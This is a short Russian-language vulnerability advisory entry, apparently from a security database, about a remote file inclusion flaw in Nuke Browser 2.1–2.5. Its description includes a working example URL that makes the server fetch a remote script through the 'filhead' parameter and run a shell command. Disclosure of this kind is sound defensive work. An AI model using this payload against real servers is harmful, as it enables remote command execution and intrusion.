Дата публикации: | 06.02.2003 |
Всего просмотров: | 1075 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость включения файла обнаружена в Nuke Browser (lophas.phpwebhosting.com/nukebrowser.php). Удаленный пользователь может выполнить произвольные команды на уязвимом сервере. Удаленный атакующий может включить удаленно расположенный сценарий, указанный в переменной '$filhead', который будет выполнен на уязвимом сервере. Пример: http://[victim]/nukebrowser.php?filnavn=http://[anysite]&filhead=http://[webhosting]/cmd.txt&cmd=idУязвимость обнаружена в Nuke Browser 2.1-2.5 |
Ссылки: | Nukebrowser bug |